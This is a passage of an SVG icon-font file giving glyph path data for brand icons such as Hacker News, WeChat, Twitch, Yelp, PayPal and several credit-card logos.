d="M18.7998 226.3c0 67.9004 73 100.2 126.8 69.2002c18.8008 0 37.3008 5 54.5 11.7998v-50.5c-6.5 -2.2002 -13 -4 -19.6992 -5.5c2.5 -6.7998 4 -13.7002 4 -21c0 -42.2002 -26 -74.5 -67.5 -82.2002c-12.5 -2.59961 -19.7002 -7.7998 -19.7002 -21.2998
c0 -38.2998 101 -12.2998 101 -82.7998c0 -57.2998 -38.7002 -76 -90.7002 -76c-42.7002 0 -91.5 14.2998 -91.5 65.7998c0 29.9004 18 47.2002 45.2998 56.2002v1c-25 15.2002 -19.7998 57.5 -1 65.7998v1c-25.2998 8.5 -41.5 43.2002 -41.5 68.5zM106.5 62.5
c-17.7002 0 -39.7002 -3.7998 -39.7998 -26.0996c0 -22.5 26 -25.2002 43.2998 -25.2002c18.2002 0 37.7002 4.5 37.7002 26.2998c0 22 -24.2002 25 -41.2002 25zM103.3 192c21.7002 0 29.7002 14 29.7002 34.2998c0 48.2998 -61 48.7998 -61 -0.5
c0 -20.7998 9.2998 -33.7998 31.2998 -33.7998zM432 142.5v-49c-13.2998 -7.2998 -30.5 -9.7998 -45.5 -9.7998c-53.5 0 -59.7998 42.2002 -59.7998 85.7002v87.6992h0.5v1c-7 0 -7.2998 1.60059 -24 -1v47.5h24c0 22.3008 0.299805 31 -1.5 41.2002h56.7002
c-2 -13.7998 -1.5 -27.5 -1.5 -41.2002h51v-47.5s-19.3008 1 -51 1v-91.0996c0 -14.7998 3.2998 -32.7998 21.7998 -32.7998c9.7998 0 21.2998 2.7998 29.2998 8.2998zM286 379.3c0 -18.7002 -14.5 -36.2002 -33.7998 -36.2002c-19.7998 0 -34.5 17.2002 -34.5 36.2002
c0 19.2998 14.5 36.7002 34.5 36.7002c19.7998 0 33.7998 -18 33.7998 -36.7002zM279.8 304.8c-1.7998 -14.5996 -1.59961 -199.8 0 -217.8h-55.5c1.60059 18.0996 1.7998 203 0 217.8h55.5z" />
    <glyph glyph-name="hacker-news" unicode="&#xf1d4;" 
d="M0 416h448v-448h-448v448zM21.2002 218.8h-0.200195c0.0996094 0.100586 0.200195 0.299805 0.299805 0.400391c0 -0.100586 0 -0.299805 -0.0996094 -0.400391zM239.2 164.9l80.7998 155.1h-34.7998c-54.7998 -101.2 -48.2998 -98.5996 -60.6006 -125.6
c-10.0996 24.3994 -6.7998 27.2998 -59.2998 125.6h-37.2998l79.7998 -153.3v-102.7h31.4004v100.9z" />
    <glyph glyph-name="tencent-weibo" unicode="&#xf1d5;" horiz-adv-x="383" 
d="M72.2998 -47.7998c1.40039 -19.9004 -27.5996 -22.2002 -29.7002 -2.90039c-11.5996 129.9 31.1006 239.5 101.4 313.2c-15.5996 34 9.2002 77.0996 50.5996 77.0996c30.3008 0 55.1006 -24.5996 55.1006 -55.0996c0 -44 -49.5 -70.7998 -86.9004 -45.0996
c-65.7002 -71.3008 -101.399 -169.801 -90.5 -287.2zM192 447.9c92 0 166.6 -74.6006 166.6 -166.5c0 -102.301 -93.2998 -185.5 -204 -162.301c-19 4.7002 -12.5 33.2002 6.60059 29.1006c80.7998 -20.7998 167.7 42.2998 167.7 133.1c0 75.5 -61.5 136.9 -136.9 136.9
c-101 0 -168.3 -106.601 -122 -199.2c9 -17.9004 -17.5996 -30.7998 -26.2998 -13.4004c-56 108.101 22.3994 242.301 148.3 242.301z" />
    <glyph glyph-name="qq" unicode="&#xf1d6;" 
d="M433.754 27.5547c-11.5264 -1.39258 -44.8604 52.7412 -44.8604 52.7412c0 -31.3447 -16.1357 -72.2471 -51.0508 -101.786c16.8418 -5.19141 54.8428 -19.167 45.8037 -34.4209c-7.31641 -12.3428 -125.511 -7.88086 -159.633 -4.03711
c-34.1221 -3.84375 -152.315 -8.30566 -159.632 4.03711c-9.04492 15.25 28.918 29.2139 45.7832 34.415c-34.9199 29.5391 -51.0586 70.4453 -51.0586 101.792c0 0 -33.334 -54.1338 -44.8594 -52.7412c-5.37012 0.650391 -12.4238 29.6445 9.34668 99.7041
c10.2617 33.0244 21.9951 60.4785 40.1445 105.779c-3.05566 116.898 45.2441 214.956 160.262 214.962c113.737 -0.00585938 163.156 -96.1328 160.264 -214.963c18.1182 -45.2227 29.9121 -72.8506 40.1445 -105.778c21.7676 -70.0596 14.7158 -99.0527 9.3457 -99.7041z
" />
    <glyph glyph-name="weixin" unicode="&#xf1d7;" horiz-adv-x="576" 
d="M385.2 280.4c-92.4004 0 -165.4 -69.1006 -165.3 -154c0 -14.2002 2.19922 -27.9004 6.19922 -40.8008c-6.19922 -0.5 -12.0996 -0.799805 -18.2998 -0.799805c-24.3994 0 -43.7998 4.90039 -68.2002 9.7002l-68 -34.0996l19.3008 58.5996
c-48.6006 34.0996 -77.9004 78.2002 -77.9004 131.6c0 92.6006 87.5 165.4 194.7 165.4c95.5996 0 179.7 -58.2998 196.3 -136.7c-6.2002 0.799805 -12.4004 1.10059 -18.7998 1.10059zM280.7 333.3c-14.7002 0 -29.2002 -9.7002 -29.2998 -24.3994
c0 -14.5 14.5 -24.2002 29.2998 -24.2002c14.5 0 24.2002 9.7002 24.2002 24.2002c0 14.6992 -9.7002 24.3994 -24.2002 24.3994zM144.3 284.7c14.7998 0 24.4004 9.59961 24.4004 24.2002c0 14.6992 -9.60059 24.3994 -24.4004 24.3994
c-14.5 0 -29.2998 -9.59961 -29.2998 -24.3994c0 -14.5 14.7998 -24.2002 29.2998 -24.2002zM563 128.6c0 -43.7998 -29 -82.6992 -68.2002 -112.1l14.7998 -48.5996l-53.3994 29.2998c-19.7002 -4.7998 -39.2998 -9.90039 -58.6006 -9.90039
c-92.5996 0 -165.399 63.4004 -165.399 141.3c0 77.9004 72.7002 141.301 165.399 141.301c87.5 0 165.4 -63.4004 165.4 -141.301zM343.9 153.1c14.6992 0 24.3994 9.60059 24.3994 19.6006c0 9.59961 -9.59961 19.2998 -24.3994 19.2998
c-9.60059 0 -19.3008 -9.59961 -19.3008 -19.2998c0 -9.90039 9.60059 -19.6006 19.3008 -19.6006zM451 153.1c14.5 0 24.5 9.60059 24.4004 19.6006c0 9.59961 -9.90039 19.2998 -24.4004 19.2998c-9.59961 0 -19.2998 -9.59961 -19.2998 -19.2998
c0 -9.90039 9.59961 -19.6006 19.2998 -19.6006z" />
    <glyph glyph-name="slideshare" unicode="&#xf1e7;" horiz-adv-x="512" 
d="M187.7 294.3c34 0 61.7002 -25.7002 61.7002 -57.7002c0 -31.6992 -27.7002 -57.6992 -61.7002 -57.6992s-61.7002 26 -61.7002 57.6992c0 32 27.7002 57.7002 61.7002 57.7002zM331.1 294.3c34.3008 0 61.8008 -25.7002 61.7002 -57.7002
c0 -31.6992 -27.3994 -57.6992 -61.7002 -57.6992c-34 0 -61.6992 26 -61.6992 57.6992c0 32 27.6992 57.7002 61.6992 57.7002zM487.7 204.3c15.2002 10.5 25.2002 -4 16.0996 -17.7998c-18.2998 -22.5996 -53.2002 -50.2998 -106.3 -72
c56.2998 -191.7 -137.4 -222.3 -134.3 -124c0 0.700195 -0.299805 53.7998 -0.299805 93.5c-4.30078 0.799805 -8.60059 2 -13.7002 3.09961c0 -40 -0.299805 -95.8994 -0.299805 -96.5996c3.09961 -98.2002 -190.601 -67.5996 -134.301 124.1
c-53.1992 21.7002 -88 49.4004 -106.3 72c-9.09961 13.7002 0.900391 28.3008 16 17.7002c2 -1.39941 4.2998 -2.89941 6.2998 -4.2998v198.3c0 27.4004 20.6006 49.7002 46 49.7002h359.101c25.3994 0 46 -22.2998 46 -49.7002v-198.3zM457.2 185.1h0.0996094v190.601
c0 32.7998 -10.5996 45.7002 -40.8994 45.7002h-317.7c-31.7002 0 -40.6006 -10.8008 -40.6006 -45.7002v-192.4c67.7002 -35.3994 125.7 -29.0996 157.4 -28c13.4004 0.299805 22 -2.2998 27.0996 -7.7002c1.7002 -1.59961 10 -9.39941 20.3008 -17.0996
c1.09961 15.7998 10 25.7998 33.6992 24.9004c32.3008 -1.40039 91.7002 -7.7002 160.601 29.6992z" />
    <glyph glyph-name="twitch" unicode="&#xf1e8;" 
d="M40.0996 416h397.9v-274.2l-117 -117h-87l-56.7998 -56.7998h-60.2002v56.7998h-107v314.3zM397.9 161.9v214h-321v-280.9h90.2998v-56.7998l56.7998 56.7998h107zM331 299v-116.9h-40.0996v116.9h40.0996zM224 299v-116.9h-40.0996v116.9h40.0996z" />
    <glyph glyph-name="yelp" unicode="&#xf1e9;" horiz-adv-x="381" 
d="M41.9004 207.68l99.6191 -48.6094c19.2002 -9.40039 16.2002 -37.5107 -4.5 -42.71l-107.52 -26.8105c-13.4004 -3.39941 -26.71 5.90039 -28.21 19.6006c-3.40039 29.4092 0 58.4092 9 85.3193c4.41016 13.1104 19.3096 19.21 31.6104 13.21zM85.9102 -31.5703
c-11.4004 7.80078 -13.2998 23.8105 -4.08984 34.0898l74.21 82.4209c14.3096 15.8096 40.5098 5.19922 39.8096 -16.1006l-3.89941 -110.82c-0.410156 -13.7998 -13.0107 -24 -26.6104 -21.6992c-28.6104 4.7998 -55.7197 15.9102 -79.4199 32.1094zM231.24 78.3496
c-11.2998 18.1104 6.2002 40.4102 26.5098 33.9102l105.42 -34.21c13.0996 -4.2998 19.5 -19.1094 13.5996 -31.6094c-12.3994 -26 -30.3096 -49.1104 -52.71 -67.6104c-10.71 -8.7998 -26.71 -6.2002 -34.0098 5.5zM379.57 210.58
c5.5 -12.71 -1.30078 -27.3105 -14.6104 -31.21l-106.62 -30.5098c-20.5 -5.90039 -37.0996 17.0098 -25.2002 34.71l62.0107 91.9199c7.70996 11.3994 23.71 13.5 34.0098 4.39941c21.2002 -18.6992 38.6094 -42.1992 50.4102 -69.3096zM61.1104 417.82
c47 22.3994 89.21 28.2998 112.33 30.0996c13.2998 1.09961 24.5996 -9.5 24.5 -22.7998v-208.34c0 -23.2998 -30.9102 -31.6006 -42.6104 -11.4004l-104.12 180.43c-6.59961 11.5107 -2.09961 26.3105 9.90039 32.0107z" />
    <glyph glyph-name="paypal" unicode="&#xf1ed;" horiz-adv-x="384" 
d="M111.4 152.1c-3.5 -19.1992 -17.4004 -108.699 -21.5 -134c-0.300781 -1.7998 -1 -2.5 -3 -2.5h-74.6006c-7.59961 0 -13.0996 6.60059 -12.0996 13.9004l58.5996 371.9c1.5 9.59961 10.1006 16.8994 20 16.8994c152.3 0 165.101 3.7002 204 -11.3994
c60.1006 -23.3008 65.6006 -79.5 44 -140.301c-21.5 -62.5996 -72.5 -89.5 -140.1 -90.2998c-43.4004 -0.700195 -69.5 7 -75.2998 -24.2002zM357.1 296c28.4004 -21.2002 30.3008 -57.7998 23.8008 -92.5996c-16.5 -83.5 -71.9004 -112.301 -142.9 -112.301
c-15 0 -24.7002 2.30078 -29.2998 -19.6992c-15.5 -97.4004 -13.7002 -85.9004 -14.4004 -91.3008c-1.7002 -8.59961 -8.7998 -14.8994 -17.3994 -14.8994h-63.5c-7.10059 0 -11.6006 5.7998 -10.6006 12.8994c0 0 4.5 29.3008 27.1006 169.7
c0.799805 6.10059 4.7998 9.40039 10.8994 9.40039c54 0 164.601 -9.90039 204.5 103.899c3.7002 11.1006 6.7998 22.2002 8.7998 33.6006c0.5 3.09961 1.2002 2.59961 3 1.2998z" />
    <glyph glyph-name="google-wallet" unicode="&#xf1ee;" 
d="M156.8 321.2c37.6006 -60.6006 64.2002 -113.101 84.2998 -162.5c-8.2998 -33.7998 -18.7998 -66.5 -31.2998 -98.2998c-13.2002 52.2998 -26.5 101.3 -56 148.5c6.5 36.3994 2.2998 73.5996 3 112.3zM109.3 248c5 0 10 -2.5 13 -6.5
c43.7998 -59.7998 66.2998 -123.8 82.5 -193.5h-103.5c-20 69.5 -49.5 133 -91.7002 187.3c-4 5.2002 0 12.7002 6.5 12.7002h93.2002zM157.1 336h108.7c74.7998 -103 131.2 -230 143.2 -368h-113.7c-8.2002 133.5 -69.7002 260 -138.2 368zM408.9 404.5
c19 -67.5 31.0996 -139 31.0996 -212.6c0 -69.5 -9.5 -142.5 -25.2998 -203c-10.9004 92.5 -42.4004 184.6 -90.6006 270.8c-4.19922 50.5 -13.2998 99.5 -26.5 146c-1.19922 5.2998 2.5 10.2998 7.80078 10.2998h88.2998c7 0 13.3994 -4.7002 15.2002 -11.5z" />
    <glyph glyph-name="cc-visa" unicode="&#xf1f0;" horiz-adv-x="576" 
d="M470.1 216.7c0 0 7.60059 -37.2002 9.30078 -45h-33.4004c3.2998 8.89941 16 43.5 16 43.5c-0.200195 -0.299805 3.2998 9.09961 5.2998 14.8994zM576 368v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h480
c26.5 0 48 -21.5 48 -48zM152.5 116.8l63.2002 155.2h-42.5l-39.2998 -106l-4.30078 21.5l-14 71.4004c-2.2998 9.89941 -9.39941 12.6992 -18.1992 13.0996h-64.7002l-0.700195 -3.09961c15.7998 -4 29.9004 -9.80078 42.2002 -17.1006l35.7998 -135h42.5zM246.9 116.6
l25.1992 155.4h-40.1992l-25.1006 -155.4h40.1006zM386.8 167.4c0.200195 17.6992 -10.5996 31.1992 -33.7002 42.2998c-14.0996 7.09961 -22.6992 11.8994 -22.6992 19.2002c0.199219 6.59961 7.2998 13.3994 23.0996 13.3994
c13.0996 0.299805 22.7002 -2.7998 29.9004 -5.89941l3.59961 -1.7002l5.5 33.5996c-7.90039 3.10059 -20.5 6.60059 -36 6.60059c-39.7002 0 -67.5996 -21.2002 -67.7998 -51.4004c-0.299805 -22.2998 20 -34.7002 35.2002 -42.2002
c15.5 -7.59961 20.7998 -12.5996 20.7998 -19.2998c-0.200195 -10.4004 -12.6006 -15.2002 -24.1006 -15.2002c-16 0 -24.5996 2.5 -37.6992 8.2998l-5.30078 2.5l-5.59961 -34.8994c9.40039 -4.2998 26.7998 -8.10059 44.7998 -8.2998
c42.2002 -0.100586 69.7002 20.7998 70 53zM528 116.6l-32.4004 155.4h-31.0996c-9.59961 0 -16.9004 -2.7998 -21 -12.9004l-59.7002 -142.5h42.2002s6.90039 19.2002 8.40039 23.3008h51.5996c1.2002 -5.5 4.7998 -23.3008 4.7998 -23.3008h37.2002z" />
    <glyph glyph-name="cc-mastercard" unicode="&#xf1f1;" horiz-adv-x="576" 
d="M482.9 37.7002c0 -6.7998 -4.60059 -11.7002 -11.2002 -11.7002c-6.7998 0 -11.2002 5.2002 -11.2002 11.7002s4.40039 11.7002 11.2002 11.7002c6.59961 0 11.2002 -5.2002 11.2002 -11.7002zM172.1 49.4004c6.5 0 10.8008 -5.2002 10.9004 -11.7002
c0 -6.7998 -4.40039 -11.7002 -10.9004 -11.7002c-7.09961 0 -11.1992 5.2002 -11.1992 11.7002s4.09961 11.7002 11.1992 11.7002zM289.6 49.7002c5.2002 0 8.7002 -3 9.60059 -8.7002h-19.1006c0.800781 5.2002 4.10059 8.7002 9.5 8.7002zM397.4 49.4004
c6.7998 0 11.1992 -5.2002 11.1992 -11.7002c0 -6.7998 -4.39941 -11.7002 -11.1992 -11.7002c-6.80078 0 -10.9004 5.2002 -10.9004 11.7002s4.09961 11.7002 10.9004 11.7002zM503.3 23.2998c0 -0.299805 0.299805 -0.5 0.299805 -1.09961
c0 -0.299805 -0.299805 -0.5 -0.299805 -1.10059c-0.299805 -0.299805 -0.299805 -0.5 -0.5 -0.799805c-0.299805 -0.299805 -0.5 -0.5 -1.09961 -0.5c-0.299805 -0.299805 -0.5 -0.299805 -1.10059 -0.299805c-0.299805 0 -0.5 0 -1.09961 0.299805
c-0.299805 0 -0.5 0.299805 -0.799805 0.5c-0.299805 0.299805 -0.5 0.5 -0.5 0.799805c-0.299805 0.5 -0.299805 0.800781 -0.299805 1.10059c0 0.5 0 0.799805 0.299805 1.09961c0 0.5 0.299805 0.799805 0.5 1.10059c0.299805 0.299805 0.5 0.299805 0.799805 0.5
c0.5 0.299805 0.799805 0.299805 1.09961 0.299805c0.5 0 0.800781 0 1.10059 -0.299805c0.5 -0.300781 0.799805 -0.300781 1.09961 -0.5c0.299805 -0.200195 0.200195 -0.600586 0.5 -1.10059zM501.1 21.9004c0.5 0 0.5 0.299805 0.800781 0.299805
c0.299805 0.299805 0.299805 0.5 0.299805 0.799805s0 0.5 -0.299805 0.799805c-0.300781 0 -0.5 0.299805 -1.10059 0.299805h-1.59961v-3.5h0.799805v1.40039h0.299805l1.10059 -1.40039h0.799805zM576 367v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48
v352c0 26.5 21.5 48 48 48h480c26.5 0 48 -21.5 48 -48zM64 227.4c0 -76.5 62.0996 -138.5 138.5 -138.5c27.2002 0 53.9004 8.19922 76.5 23.0996c-72.9004 59.2998 -72.4004 171.2 0 230.5c-22.5996 15 -49.2998 23.0996 -76.5 23.0996
c-76.4004 0.100586 -138.5 -62 -138.5 -138.199zM288 118.6c70.5 55 70.2002 162.2 0 217.5c-70.2002 -55.2998 -70.5 -162.6 0 -217.5zM145.7 42.2998c0 8.7002 -5.7002 14.4004 -14.7002 14.7002c-4.59961 0 -9.5 -1.40039 -12.7998 -6.5
c-2.40039 4.09961 -6.5 6.5 -12.2002 6.5c-3.7998 0 -7.59961 -1.40039 -10.5996 -5.40039v4.40039h-8.2002v-36.7002h8.2002c0 18.9004 -2.5 30.2002 9 30.2002c10.1992 0 8.19922 -10.2002 8.19922 -30.2002h7.90039c0 18.2998 -2.5 30.2002 9 30.2002
c10.2002 0 8.2002 -10 8.2002 -30.2002h8.2002v23h-0.200195zM190.6 56h-7.89941v-4.40039c-2.7002 3.30078 -6.5 5.40039 -11.7002 5.40039c-10.2998 0 -18.2002 -8.2002 -18.2002 -19.2998c0 -11.2002 7.90039 -19.2998 18.2002 -19.2998
c5.2002 0 9 1.89941 11.7002 5.39941v-4.59961h7.89941v36.7998zM231.1 30.4004c0 15 -22.8994 8.19922 -22.8994 15.1992c0 5.7002 11.8994 4.80078 18.5 1.10059l3.2998 6.5c-9.40039 6.09961 -30.2002 6 -30.2002 -8.2002c0 -14.2998 22.9004 -8.2998 22.9004 -15
c0 -6.2998 -13.5 -5.7998 -20.7002 -0.799805l-3.5 -6.2998c11.2002 -7.60059 32.5996 -6 32.5996 7.5zM266.5 21.0996l-2.2002 6.80078c-3.7998 -2.10059 -12.2002 -4.40039 -12.2002 4.09961v16.5996h13.1006v7.40039h-13.1006v11.2002h-8.19922v-11.2002h-7.60059
v-7.2998h7.60059v-16.7002c0 -17.5996 17.2998 -14.4004 22.5996 -10.9004zM279.8 34.5h27.5c0 16.2002 -7.39941 22.5996 -17.3994 22.5996c-10.6006 0 -18.2002 -7.89941 -18.2002 -19.2998c0 -20.5 22.5996 -23.8994 33.7998 -14.2002l-3.7998 6
c-7.7998 -6.39941 -19.6006 -5.7998 -21.9004 4.90039zM338.9 56c-4.60059 2 -11.6006 1.7998 -15.2002 -4.40039v4.40039h-8.2002v-36.7002h8.2002v20.7002c0 11.5996 9.5 10.0996 12.7998 8.40039zM349.5 37.7002c0 11.3994 11.5996 15.0996 20.7002 8.39941l3.7998 6.5
c-11.5996 9.10059 -32.7002 4.10059 -32.7002 -15c0 -19.7998 22.4004 -23.7998 32.7002 -15l-3.7998 6.5c-9.2002 -6.5 -20.7002 -2.59961 -20.7002 8.60059zM416.2 56h-8.2002v-4.40039c-8.2998 11 -29.9004 4.80078 -29.9004 -13.8994
c0 -19.2002 22.4004 -24.7002 29.9004 -13.9004v-4.59961h8.2002v36.7998zM449.9 56c-2.40039 1.2002 -11 2.90039 -15.2002 -4.40039v4.40039h-7.90039v-36.7002h7.90039v20.7002c0 11 9 10.2998 12.7998 8.40039zM490.2 70.9004h-7.90039v-19.3008
c-8.2002 10.9004 -29.8994 5.10059 -29.8994 -13.8994c0 -19.4004 22.5 -24.6006 29.8994 -13.9004v-4.59961h7.90039v51.7002zM497.8 146v-4.59961h0.799805v4.59961h1.90039v0.799805h-4.59961v-0.799805h1.89941zM504.4 22.2002c0 0.5 0 1.09961 -0.300781 1.59961
c-0.299805 0.299805 -0.5 0.799805 -0.799805 1.10059c-0.299805 0.299805 -0.799805 0.5 -1.09961 0.799805c-0.5 0 -1.10059 0.299805 -1.60059 0.299805c-0.299805 0 -0.799805 -0.299805 -1.39941 -0.299805c-0.5 -0.299805 -0.799805 -0.5 -1.10059 -0.799805
c-0.5 -0.300781 -0.799805 -0.800781 -0.799805 -1.10059c-0.299805 -0.5 -0.299805 -1.09961 -0.299805 -1.59961c0 -0.299805 0 -0.799805 0.299805 -1.40039c0 -0.299805 0.299805 -0.799805 0.799805 -1.09961c0.300781 -0.299805 0.5 -0.5 1.10059 -0.799805
c0.5 -0.300781 1.09961 -0.300781 1.39941 -0.300781c0.5 0 1.10059 0 1.60059 0.300781c0.299805 0.299805 0.799805 0.5 1.09961 0.799805s0.5 0.799805 0.799805 1.09961c0.300781 0.600586 0.300781 1.10059 0.300781 1.40039zM507.6 146.9h-1.39941l-1.60059 -3.5
l-1.59961 3.5h-1.40039v-5.40039h0.800781v4.09961l1.59961 -3.5h1.09961l1.40039 3.5v-4.09961h1.09961v5.40039zM512 227.4c0 76.1992 -62.0996 138.3 -138.5 138.3c-27.2002 0 -53.9004 -8.2002 -76.5 -23.1006c72.0996 -59.2998 73.2002 -171.5 0 -230.5
c22.5996 -15 49.5 -23.0996 76.5 -23.0996c76.4004 -0.0996094 138.5 61.9004 138.5 138.4z" />
    <glyph glyph-name="cc-discover" unicode="&#xf1f2;" horiz-adv-x="576" 
d="M520.4 251.9c0 -8.40039 -5.5 -12.8008 -15.8008 -12.8008h-4.69922v24.9004h4.89941c10.1006 0 15.6006 -4.2002 15.6006 -12.0996zM528 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h480z
M483.9 277.1v-82h16v32.8008h2.19922l22.2002 -32.8008h19.6006l-25.8008 34.4004c12.1006 2.5 18.7002 10.5996 18.7002 23.2002c0 28.5 -30.2998 24.3994 -52.8994 24.3994zM428 277v-82h45.2998v13.7998h-29.2998v22.2002h28.2998v13.7998h-28.2998v18.2002h29.2998v14
h-45.2998zM359.3 277h-17.5l35 -84.2002h8.60059l35.5 84.2002h-17.5l-22.2002 -55.2002zM303.4 280c-24.6006 0 -44.6006 -19.9004 -44.6006 -44.5996c0 -24.6006 19.9004 -44.6006 44.6006 -44.6006c24.5996 0 44.5996 19.9004 44.5996 44.6006
c0 24.5996 -19.9004 44.5996 -44.5996 44.5996zM254.1 273.9c-30.1992 15 -63.2998 -6.80078 -63.2998 -38c0 -32.5 33.6006 -52.5 63.2998 -38.2002v19c-19.2998 -19.2998 -46.7998 -5.7998 -46.7998 19.2002c0 23.6992 26.7002 39.0996 46.7998 19v19zM156.9 207.6
c-7.60059 0 -13.8008 3.7002 -17.5 10.8008l-10.3008 -9.90039c17.8008 -26.0996 56.6006 -18.2002 56.6006 11.2998c0 13.1006 -5.40039 19 -23.6006 25.6006c-9.59961 3.39941 -12.2998 5.89941 -12.2998 10.2998c0 8.7002 14.5 14.0996 24.9004 2.5l8.39941 10.7998
c-19.0996 17.0996 -49.6992 8.90039 -49.6992 -14.2998c0 -11.2998 5.19922 -17.2002 20.1992 -22.7002c25.7002 -9.09961 14.7002 -24.4004 3.30078 -24.4004zM55.4004 195c30.8994 0 44.0996 22.4004 44.0996 40.9004c0 24.0996 -18 41.0996 -44.0996 41.0996h-23.4004
v-82h23.4004zM122.9 195v82h-16v-82h16zM544 15v145c-33.2998 -20.7998 -226.4 -124.4 -416 -160h401c8.2002 0 15 6.7998 15 15zM74.0996 256.4c5.7002 -5 8.90039 -12.6006 8.90039 -20.5c0 -7.90039 -3.2002 -15.5 -8.90039 -20.7002
c-4.89941 -4.40039 -11.5996 -6.40039 -21.8994 -6.40039h-4.2002v54.2002h4.2002c10.2998 0 16.7002 -1.7002 21.8994 -6.59961z" />
    <glyph glyph-name="cc-amex" unicode="&#xf1f3;" horiz-adv-x="576" 
d="M325.1 280.2c0.100586 -8 -4.2998 -15.7002 -11.6992 -18.7002c9.5 -3.2998 11 -9.2002 11 -18.4004v-13.5h-16.6006c-0.299805 14.8008 3.60059 25.1006 -14.7998 25.1006h-18v-25.1006h-16.4004v69.3008l39.1006 -0.300781c13.2998 0 27.3994 -2 27.3994 -18.3994z
M295.7 268.9c5.7002 0 11 1.2998 11 7.89941c0 6.40039 -5.60059 7.40039 -10.7002 7.40039h-21v-15.2998h20.7002zM279 179.4c15.5996 0 27.9004 -5.40039 27.9004 -22.7002c0 -27.9004 -30.4004 -23.2998 -49.3008 -23.2998l-0.0996094 -23.3008h-32.2002l-20.3994 23
l-21.3008 -23h-65.3994l0.0996094 69.3008h66.5l20.5 -22.8008l21 22.8008h52.7002zM175.2 124.7l19 20.2002l-17.9004 20.1992h-41.7002v-12.5h36.3008v-14.0996h-36.3008v-13.7998h40.6006zM241 116.5v55.5l-25.2998 -27.4004zM278.8 147.5
c5.90039 0 10.5 2.7998 10.5 9.2002c0 6.09961 -4.59961 8.39941 -10.2002 8.39941h-21.5v-17.5996h21.2002zM247.2 284.2h-38.9004v-12.5h37.7998v-14.1006h-37.7998v-13.7998h38.9004v-14.2998h-55.5v69.2998h55.5v-14.5996zM576 192.6h-0.200195h0.200195zM381.4 160.7
c-0.100586 -7.60059 -4.2002 -15.2998 -11.9004 -18.4004c9.2002 -3.2998 11 -9.5 11 -18.3994l-0.0996094 -13.8008h-16.6006l0.100586 11.5c0 11.8008 -3.80078 13.8008 -14.8008 13.8008h-17.5996l-0.0996094 -25.3008h-16.6006l0.100586 69.3008h39.3994
c13 0 27.1006 -2.30078 27.1006 -18.7002zM352.2 149.5c5.59961 0 11 1.2998 11 8.2002c0 6.39941 -5.60059 7.39941 -10.7002 7.39941h-21v-15.5996h20.7002zM179.4 229.5h-16.8008v54.2002l-24 -54.2002h-14.5996l-24 54.2002v-54.2002h-33.7998l-6.40039 15.2998h-34.5
l-6.39941 -15.2998h-17.9004l29.7002 69.2998h24.5l28.0996 -65.7002v65.7002h27.1006l21.6992 -47l19.7002 47h27.6006v-69.2998zM31.2002 259.2h22.7002l-11.5 27.5996zM508.6 100.3c34.8008 0 54.8008 -2.2002 67.5 6.10059v-90.4004c0 -26.5 -21.5 -48 -48 -48h-480.1
c-26.5 0 -48 21.5 -48 48v203.7h26.5996c4.2002 10.0996 2.2002 5.2998 6.40039 15.2998h19.2002c4.2002 -10 2.2002 -5.2002 6.39941 -15.2998h52.9004v11.3994c2.2002 -5 1.09961 -2.5 5.09961 -11.3994h29.5c2.40039 5.5 2.60059 5.7998 5.10059 11.3994v-11.3994h135.5
v25.0996c6.39941 0 8 0.100586 9.7998 -0.200195c0 0 -0.200195 -10.8994 0.0996094 -24.7998h66.5v8.90039c7.40039 -5.90039 17.4004 -8.90039 29.7002 -8.90039h26.7998c4.2002 10.1006 2.2002 5.2998 6.40039 15.2998h19c6.5 -15 0.200195 -0.5 6.59961 -15.2998
h52.8008v21.9004c11.7998 -19.7002 7.7998 -12.9004 13.1992 -21.9004h41.6006v92h-39.9004v-18.3994c-12.2002 20.1992 -6.2998 10.3994 -11.2002 18.3994h-43.2998v-20.5996c-6.2002 14.5996 -4.59961 10.7998 -8.7998 20.5996h-32.4004
c-0.399414 0 -2.2998 -0.200195 -2.2998 0.299805h-27.5996c-12.7998 0 -23.1006 -3.19922 -30.7002 -9.2998v9.2998h-39.9004v-5.2998c-10.7998 6.10059 -20.6992 5.10059 -64.3994 5.2998c-0.100586 0 -11.6006 0.100586 -11.6006 0h-103
c-2.5 -6.09961 -6.7998 -16.3994 -12.5996 -30c-2.7998 6 -11 23.8008 -13.9004 30h-46v-21.0996c-7.39941 17.4004 -4.69922 11 -9 21.0996h-39.6992c-3.40039 -7.89941 -13.7002 -32 -23.1006 -53.8994v109.8c0 26.5 21.5 48 48 48h480c26.5 0 48 -21.5 48 -48v-175.4
c-37.7002 0.200195 -44 0.900391 -54.2998 -5v5c-45.2998 0 -53.5 1.7002 -64.9004 -5.19922v5.19922h-78.1992v-5.09961c-11.4004 6.5 -21.4004 5.09961 -75.7002 5.09961v-5.59961c-6.2998 3.7002 -14.5 5.59961 -24.2998 5.59961h-58
c-3.5 -3.7998 -12.5 -13.6992 -15.7002 -17.1992c-12.7002 14.0996 -10.5 11.5996 -15.5 17.1992h-83.1006v-92.2998h82c3.30078 3.5 12.9004 13.9004 16.1006 17.4004c12.7002 -14.2998 10.2998 -11.7002 15.3994 -17.4004h48.9004
c0 14.7002 0.0996094 8.2998 0.0996094 23c11.5 -0.200195 24.3008 0.200195 34.3008 6.2002c0 -13.9004 -0.100586 -17.0996 -0.100586 -29.2002h39.6006c0 18.5 0.0996094 7.40039 0.0996094 25.2998c6.2002 0 7.7002 0 9.40039 -0.0996094
c0.0996094 -1.2998 0 0 0 -25.2002c152.8 0 145.899 -1.09961 156.699 4.5v-4.5zM544.9 164.8c-4.60059 0 -9.2002 -0.700195 -9.2002 -6.5c0 -12.2002 28.7998 0.299805 39.2998 -13.5v-25.7998c-4.90039 -7.09961 -14.0996 -8.90039 -22.5 -8.90039h-32l0.0996094 14.8008
h32c4.10059 0 8.40039 1.2998 8.40039 6.39941c0 14.6006 -42.7002 -5.59961 -42.7002 27.4004c0 14.0996 11 20.7002 23.7998 20.7002h32.9004v-14.6006h-30.0996zM487.9 125c4.09961 0 8.69922 1 8.7998 6.40039c0 14.8994 -42.7002 -5.60059 -42.7002 27.3994
